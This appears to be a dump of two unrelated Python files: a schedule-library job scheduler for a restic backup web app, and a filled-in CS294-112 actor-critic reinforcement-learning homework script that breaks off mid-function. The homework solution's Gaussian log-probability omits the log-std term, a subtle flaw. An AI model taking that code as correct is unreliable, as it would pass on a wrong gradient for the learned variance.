|
job_scheduler.py
|
import logging
from threading import Thread, Lock
from schedule import Scheduler, Job, ScheduleError, ScheduleValueError
from resticweb.tools.job_build import JobBuilder
from resticweb.tools.local_session import LocalSession
from resticweb.models.general import Schedule, ScheduleJobMap
from wtforms import ValidationError
from time import sleep
from datetime import datetime, timedelta
from queue import Queue, Empty
import json
import random
class JobScheduler(Scheduler):
t_lock = Lock()
# janky way of updating the next_run for each schedule after
# the job runs
update_queue = Queue()
def __init__(self):
super().__init__()
#self.logger = logging.getLogger("mainLogger")
missed_schedules = []
with LocalSession() as session:
schedules = session.query(Schedule)
for schedule in schedules:
if self.should_run_missed_schedule(schedule):
missed_schedules.append(schedule.id)
if schedule.next_run is not None and schedule.next_run < datetime.now():
schedule.next_run = self.init_schedule(schedule)
else:
schedule.next_run = self.init_schedule(schedule, schedule.next_run)
session.commit()
for missed_schedule in missed_schedules:
self.populate_queue_from_schedule_id(missed_schedule)
#print(self.jobs)
def pause_schedule(self, schedule_id):
with LocalSession() as session:
schedule = session.query(Schedule).filter_by(id=schedule_id).first()
schedule.paused = True
schedule.next_run = None
session.commit()
self.t_lock.acquire()
self.clear(schedule_id)
self.t_lock.release()
def resume_schedule(self, schedule_id):
#schedule_missed = False
with LocalSession() as session:
schedule = session.query(Schedule).filter_by(id=schedule_id).first()
# if self.should_run_missed_schedule(schedule):
# schedule_missed = True
schedule.paused = False
schedule.next_run = self.init_schedule(schedule)
session.commit()
#if schedule_missed:
# self.populate_queue_from_schedule_id(schedule_id)
def toggle_pause(self, schedule_id):
with LocalSession() as session:
schedule = session.query(Schedule).filter_by(id=schedule_id).first()
paused = schedule.paused
if paused:
self.resume_schedule(schedule_id)
else:
self.pause_schedule(schedule_id)
def should_run_missed_schedule(self, schedule):
if not schedule.next_run:
return False
# use total_seconds() so runs missed by more than a day are not treated as recent
minute_delta = (datetime.now() - schedule.next_run).total_seconds() / 60
return minute_delta < schedule.missed_timeout and minute_delta > 0
def init_schedule(self, schedule, _next_run=None):
if not schedule.paused:
self.t_lock.acquire()
time_unit = schedule.time_unit
next_run = None
if time_unit != 'week' and time_unit != 'weeks':
if time_unit == 'minute':
job = self.every().minute.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'minutes':
job = self.every(schedule.time_interval).minutes.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'hour':
job = self.every().hour.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'hours':
job = self.every(schedule.time_interval).hours.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'day':
job = self.every().day.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'days':
job = self.every(schedule.time_interval).days.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'week':
job = self.every().week.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'weeks':
job = self.every(schedule.time_interval).weeks.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'monday':
job = self.every().monday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'tuesday':
job = self.every().tuesday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'wednesday':
job = self.every().wednesday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'thursday':
job = self.every().thursday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'friday':
job = self.every().friday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'saturday':
job = self.every().saturday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'sunday':
job = self.every().sunday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
if schedule.time_at and len(schedule.time_at) > 0:
try:
job.at(schedule.time_at)
except ScheduleValueError:
pass
job._schedule_next_run()
if _next_run:
job.next_run = _next_run
next_run = job.next_run
else:
next_run = self.process_week_schedule(schedule, _next_run)
self.t_lock.release()
return next_run
def process_week_schedule(self, schedule, _next_run=None):
scheduled_days = json.loads(schedule.days)
closest_time = None
for day in scheduled_days:
if day == 'monday':
job = self.every().monday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif day == 'tuesday':
job = self.every().tuesday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif day == 'wednesday':
job = self.every().wednesday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif day == 'thursday':
job = self.every().thursday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif day == 'friday':
job = self.every().friday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif day == 'saturday':
job = self.every().saturday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif day == 'sunday':
job = self.every().sunday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
job.interval = schedule.time_interval if schedule.time_interval else 1
if schedule.time_at and len(schedule.time_at) > 0:
try:
job.at(schedule.time_at)
except ScheduleValueError:
pass
job._schedule_next_run()
if (closest_time is None or job.next_run < closest_time):
closest_time = job.next_run
return closest_time
def run_background(self):
self.scheduler_thread = Thread(target=self.run, daemon=True)
self.scheduler_thread.start()
def run(self):
while True:
self.run_pending()
self.process_update_queue()
sleep(5)
# need to customize the Job object itself a bit so we have to change
# the "every" method to use the CustomJob instead of the regular Job
def every(self, interval=1):
"""
Schedule a new periodic job.
:param interval: A quantity of a certain time unit
:return: An unconfigured :class:`Job <Job>`
"""
job = CustomJob(interval, self)
return job
def process_update_queue(self):
self.t_lock.acquire()
while True:
try:
item = self.update_queue.get(block=False)
self.update_next_run(item)
except Empty:
self.t_lock.release()
return
# gets the next run time from the scheduler instance and stores it in the
# database's schedule table
def update_next_run(self, schedule_id):
with LocalSession() as session:
schedule = session.query(Schedule).filter_by(id=schedule_id).first()
# schedule.next_run = self.get_job_from_tag(schedule_id).next_run
schedule.next_run = self.get_next_run_from_tag(schedule_id)
session.commit()
def get_job_from_tag(self, tag):
for job in self.jobs:
if tag in job.tags:
return job
return None
def get_next_run_from_tag(self, tag):
jobs = self.get_jobs_from_tag(tag)
closest_time = None
for job in jobs:
if closest_time is None or job.next_run < closest_time:
closest_time = job.next_run
return closest_time
def get_jobs_from_tag(self, tag):
job_list = []
for job in self.jobs:
if tag in job.tags:
job_list.append(job)
return job_list
def populate_queue_from_schedule_id(self, schedule_id):
self.t_lock.acquire()
self.update_queue.put(schedule_id)
self.t_lock.release()
self.t_lock.acquire()
job_ids = []
with LocalSession() as session:
schedule_job_maps = session.query(ScheduleJobMap).filter_by(schedule_id=schedule_id).order_by(ScheduleJobMap.sort.asc())
for job_map in schedule_job_maps:
job_ids.append(job_map.job_id)
schedule = session.query(Schedule).filter_by(id=schedule_id).first()
# schedule.next_run = self.get_job_from_tag(schedule_id).next_run
schedule.next_run = self.get_next_run_from_tag(schedule_id)
session.commit()
for job_id in job_ids:
builder = JobBuilder(saved_job_id=job_id)
builder.run_job()
self.t_lock.release()
def add_schedule(self, name, time_unit, description=None, time_interval=None, time_at=None, missed_timeout=60, jobs=None, scheduled_days=None):
with LocalSession() as session:
new_schedule = Schedule(name=name,
description=description,
time_unit=time_unit,
time_interval=time_interval,
time_at=time_at,
missed_timeout=missed_timeout,
days=json.dumps(scheduled_days))
session.add(new_schedule)
session.commit()
sort_counter = 0
if jobs:
for job_id in jobs:
job_map = ScheduleJobMap(schedule_id=new_schedule.id,
job_id=job_id,
sort=sort_counter)
session.add(job_map)
sort_counter += 1
new_schedule.next_run = self.init_schedule(new_schedule)
session.commit()
def update_jobs(self, schedule_id, jobs):
self.t_lock.acquire()
with LocalSession() as session:
old_jobs = session.query(ScheduleJobMap).filter_by(schedule_id=schedule_id).all()
for job in old_jobs:
session.delete(job)
sort_counter = 0
for job_id in jobs:
new_job = ScheduleJobMap(schedule_id=schedule_id, job_id=job_id, sort=sort_counter)
session.add(new_job)
sort_counter += 1
session.commit()
self.t_lock.release()
def update_schedule(self, name, time_unit, schedule_id, description=None, time_interval=None, time_at=None, missed_timeout=60, scheduled_days=None):
with LocalSession() as session:
schedule = session.query(Schedule).filter_by(id=schedule_id).first()
schedule.name = name
schedule.description = description
schedule.time_unit = time_unit
schedule.time_interval = time_interval
schedule.time_at = time_at
schedule.missed_timeout = missed_timeout
schedule.days = json.dumps(scheduled_days)
session.commit()
self.t_lock.acquire()
self.clear(schedule_id)
self.t_lock.release()
schedule.next_run = self.init_schedule(schedule)
session.commit()
def delete_schedule(self, schedule_id):
self.t_lock.acquire()
self.clear(schedule_id)
self.t_lock.release()
with LocalSession() as session:
schedule = session.query(Schedule).filter_by(id=schedule_id).first()
session.delete(schedule)
session.commit()
class CustomJob(Job):
@property
def monday(self):
self.start_day = 'monday'
return self.weeks
@property
def tuesday(self):
self.start_day = 'tuesday'
return self.weeks
@property
def wednesday(self):
self.start_day = 'wednesday'
return self.weeks
@property
def thursday(self):
self.start_day = 'thursday'
return self.weeks
@property
def friday(self):
self.start_day = 'friday'
return self.weeks
@property
def saturday(self):
self.start_day = 'saturday'
return self.weeks
@property
def sunday(self):
self.start_day = 'sunday'
return self.weeks
def _schedule_next_run(self):
"""
Compute the instant when this job should run next.
"""
if self.unit not in ('seconds', 'minutes', 'hours', 'days', 'weeks'):
raise ScheduleValueError('Invalid unit')
if self.latest is not None:
if not (self.latest >= self.interval):
raise ScheduleError('`latest` is greater than `interval`')
interval = random.randint(self.interval, self.latest)
else:
interval = self.interval
self.period = timedelta(**{self.unit: interval})
self.next_run = datetime.now() + self.period
if self.start_day is not None:
if self.unit != 'weeks':
raise ScheduleValueError('`unit` should be \'weeks\'')
weekdays = (
'monday',
'tuesday',
'wednesday',
'thursday',
'friday',
'saturday',
'sunday'
)
if self.start_day not in weekdays:
raise ScheduleValueError('Invalid start day')
weekday = weekdays.index(self.start_day)
days_ahead = weekday - self.next_run.weekday()
if days_ahead <= 0: # Target day already happened this week
days_ahead += 7
#print("--------")
#print(self.next_run)
#print(timedelta(days_ahead))
#print(self.period)
self.next_run += timedelta(days_ahead) - (self.period / self.interval)
#print(self.next_run)
if self.at_time is not None:
if (self.unit not in ('days', 'hours', 'minutes')
and self.start_day is None):
raise ScheduleValueError(('Invalid unit without'
' specifying start day'))
kwargs = {
'second': self.at_time.second,
'microsecond': 0
}
if self.unit == 'days' or self.start_day is not None:
kwargs['hour'] = self.at_time.hour
if self.unit in ['days', 'hours'] or self.start_day is not None:
kwargs['minute'] = self.at_time.minute
self.next_run = self.next_run.replace(**kwargs)
# If we are running for the first time, make sure we run
# at the specified time *today* (or *this hour*) as well
if not self.last_run:
now = datetime.now()
if (self.unit == 'days' and self.at_time > now.time() and
self.interval == 1):
self.next_run = self.next_run - timedelta(days=1)
elif self.unit == 'hours' \
and self.at_time.minute > now.minute \
or (self.at_time.minute == now.minute
and self.at_time.second > now.second):
self.next_run = self.next_run - timedelta(hours=1)
elif self.unit == 'minutes' \
and self.at_time.second > now.second:
self.next_run = self.next_run - \
timedelta(minutes=1)
if self.start_day is not None and self.at_time is not None:
# Let's see if we will still make that time we specified today
if (self.next_run - datetime.now()).days >= 7 * self.interval:
self.next_run -= self.period / self.interval
#print(self.next_run)
#print("--------")
|
train_ac_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Soroush Nasiriany, Sid Reddy, and Greg Kahn
"""
import numpy as np
import tensorflow as tf
#import tensorflow_probability as tfp
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
tf.logging.set_verbosity(tf.logging.ERROR)
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
#============================================================================================#
# Utilities
#============================================================================================#
def normalize(values, mean=0., std=1.):
values = (values - values.mean()) / (values.std() + 1e-8)
return mean + (std + 1e-8) * values
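# Editor's sketch (not in the original script): a quick numeric check of
# normalize(), assuming a NumPy array as input. Values are standardized to
# zero mean / unit std and then rescaled to the requested mean and std.
def _normalize_example():  # hypothetical helper, never called
    x = np.array([1., 2., 3.])
    y = normalize(x, mean=10., std=2.)
    # y is approximately [7.55, 10.0, 12.45]
    return y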
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
output_activation: activation of the output layers
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
# YOUR HW2 CODE HERE
with tf.variable_scope(scope):
h = input_placeholder
for i in range(n_layers):
h = tf.layers.dense(h, size, activation=activation, name='h{}'.format(i + 1))
output_placeholder = tf.layers.dense(h, output_size, activation=output_activation, name='output')
return output_placeholder
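# Editor's sketch (not in the original script): how build_mlp is wired up later
# in this file, e.g. for a discrete policy head. The observation/action sizes
# and scope name here are illustrative only.
def _build_mlp_example():  # hypothetical helper, never called
    ob_ph = tf.placeholder(shape=[None, 4], name="example_ob", dtype=tf.float32)
    logits = build_mlp(ob_ph, output_size=2, scope="example_policy",
                       n_layers=2, size=64, activation=tf.tanh)
    return logits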
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_AC)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Actor Critic
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_advantage_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.num_target_updates = computation_graph_args['num_target_updates']
self.num_grad_steps_per_target_update = computation_graph_args['num_grad_steps_per_target_update']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_advantage_args['gamma']
self.normalize_advantages = estimate_advantage_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
tf_config.gpu_options.allow_growth = True # may need if using GPU
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
def define_placeholders(self):
"""
Placeholders for batch observations / actions / advantages in actor critic
loss function.
See Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
# YOUR HW2 CODE HERE
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
if self.discrete:
# YOUR_HW2 CODE_HERE
sy_logits_na = build_mlp(sy_ob_no, self.ac_dim, 'policy_mlp', self.n_layers, self.size)
return sy_logits_na
else:
# YOUR_HW2 CODE_HERE
sy_mean = build_mlp(sy_ob_no, self.ac_dim, 'policy_mlp', self.n_layers, self.size)
sy_logstd = tf.get_variable('sy_logstd', [self.ac_dim])
return (sy_mean, sy_logstd)
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_HW2 CODE_HERE
sy_sampled_ac = tf.squeeze(tf.multinomial(sy_logits_na, 1), axis=1)
else:
sy_mean, sy_logstd = policy_parameters
# YOUR_HW2 CODE_HERE
sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(tf.shape(sy_mean))
return sy_sampled_ac
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_HW2 CODE_HERE
sy_logprob_n = -tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=sy_ac_na,
logits=sy_logits_na
)
else:
sy_mean, sy_logstd = policy_parameters
# YOUR_HW2 CODE_HERE
sy = (sy_ac_na - sy_mean) / tf.exp(sy_logstd)
sy_logprob_n = -0.5 * tf.reduce_sum(sy * sy, axis=1)
return sy_logprob_n
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch size /n/, observation dim)
_na - this tensor should have shape (batch size /n/, action dim)
_n - this tensor should have shape (batch size /n/)
Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
actor_loss = tf.reduce_sum(-self.sy_logprob_n * self.sy_adv_n)
self.actor_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(actor_loss)
# define the critic
self.critic_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_critic",
n_layers=self.n_layers,
size=self.size))
self.sy_target_n = tf.placeholder(shape=[None], name="critic_target", dtype=tf.float32)
self.critic_loss = tf.losses.mean_squared_error(self.sy_target_n, self.critic_prediction)
self.critic_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.critic_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode = (len(paths) == 0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards, next_obs, terminals = [], [], [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
# YOUR HW2 CODE HERE
ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no: ob.reshape(1, -1)})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
# add the observation after taking a step to next_obs
# YOUR CODE HERE
next_obs.append(ob)
rewards.append(rew)
steps += 1
# If the episode ended, the corresponding terminal value is 1
# otherwise, it is 0
# YOUR CODE HERE
if done or steps > self.max_path_length:
terminals.append(1)
break
else:
terminals.append(0)
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32),
"next_observation": np.array(next_obs, dtype=np.float32),
"terminal": np.array(terminals, dtype=np.float32)}
return path
def estimate_advantage(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Estimates the advantage function value for each timestep.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep or 0 if the episode did not end
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
# First, estimate the Q value as Q(s, a) = r(s, a) + gamma*V(s')
# To get the advantage, subtract the V(s) to get A(s, a) = Q(s, a) - V(s)
# This requires calling the critic twice --- to obtain V(s') when calculating Q(s, a),
# and V(s) when subtracting the baseline
# Note: don't forget to use terminal_n to cut off the V(s') term when computing Q(s, a)
# otherwise the values will grow without bound.
# YOUR CODE HERE
v_n = self.sess.run(self.critic_prediction, feed_dict={self.sy_ob_no: ob_no})
next_v_n = self.sess.run(self.critic_prediction, feed_dict={self.sy_ob_no: next_ob_no})
q_n = re_n + (1 - terminal_n) * self.gamma * next_v_n
adv_n = q_n - v_n
if self.normalize_advantages:
# YOUR_HW2 CODE_HERE
adv_n = normalize(adv_n)
return adv_n
def update_critic(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Update the parameters of the critic.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep or 0 if the episode did not end
returns:
nothing
"""
# Use bootstrapped target values to update the critic
# Compute the target values r(s, a) + gamma*V(s') by calling the critic to compute V(s')
# In total, take n=self.num_grad_steps_per_target_update*self.num_target_updates gradient update steps
# Every self.num_grad_steps_per_target_update steps, recompute the target values
# by evaluating V(s') on the updated critic
# Note: don't forget to use terminal_n to cut off the V(s') term when computing the target
# otherwise the values will grow without bound.
# YOUR CODE HERE
for i in range(self.num_target_updates):
next_v_n = self.sess.run(self.critic_prediction, feed_dict={self.sy_ob_no: next_ob_no})
q_n = re_n + (1 - terminal_n) * self.gamma * next_v_n
for j in range(self.num_grad_steps_per_target_update):
feed_dict = {
self.sy_ob_no: ob_no,
self.sy_target_n: q_n
}
_ = self.sess.run(self.critic_update_op, feed_dict=feed_dict)
def update_actor(self, ob_no, ac_na, adv_n):
"""
Update the parameters of the policy.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
self.sess.run(self.actor_update_op,
feed_dict={self.sy_ob_no: ob_no, self.sy_ac_na: ac_na, self.sy_adv_n: adv_n})
def train_AC(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
num_target_updates,
num_grad_steps_per_target_update,
animate,
logdir,
normalize_advantages,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
'num_target_updates': num_target_updates,
'num_grad_steps_per_target_update': num_grad_steps_per_target_update,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_advantage_args = {
'gamma': gamma,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_advantage_args) #estimate_return_args
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = np.concatenate([path["reward"] for path in paths])
next_ob_no = np.concatenate([path["next_observation"] for path in paths])
terminal_n = np.concatenate([path["terminal"] for path in paths])
# Call tensorflow operations to:
# (1) update the critic, by calling agent.update_critic
# (2) use the updated critic to compute the advantage, by calling agent.estimate_advantage
# (3) use the estimated advantage values to update the actor, by calling agent.update_actor
# YOUR CODE HERE
agent.update_critic(ob_no, next_ob_no, re_n, terminal_n)
adv_n = agent.estimate_advantage(ob_no, next_ob_no, re_n, terminal_n)
agent.update_actor(ob_no, ac_na, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vac')
parser.add_argument('--no_time', '-nt', action='store_true')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--num_target_updates', '-ntu', type=int, default=10)
parser.add_argument('--num_grad_steps_per_target_update', '-ngsptu', type=int, default=10)
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=64)
parser.add_argument('--gpu', type=int, default=0)
args = parser.parse_args()
os.environ["CUDA_VISIBLE_DEVICES"] = str(args.gpu)
data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')
if not (os.path.exists(data_path)):
os.makedirs(data_path)
logdir = 'ac_' + args.exp_name + '_' + args.env_name
if not args.no_time:
logdir = logdir + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join(data_path, logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_AC(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
num_target_updates=args.num_target_updates,
num_grad_steps_per_target_update=args.num_grad_steps_per_target_update,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
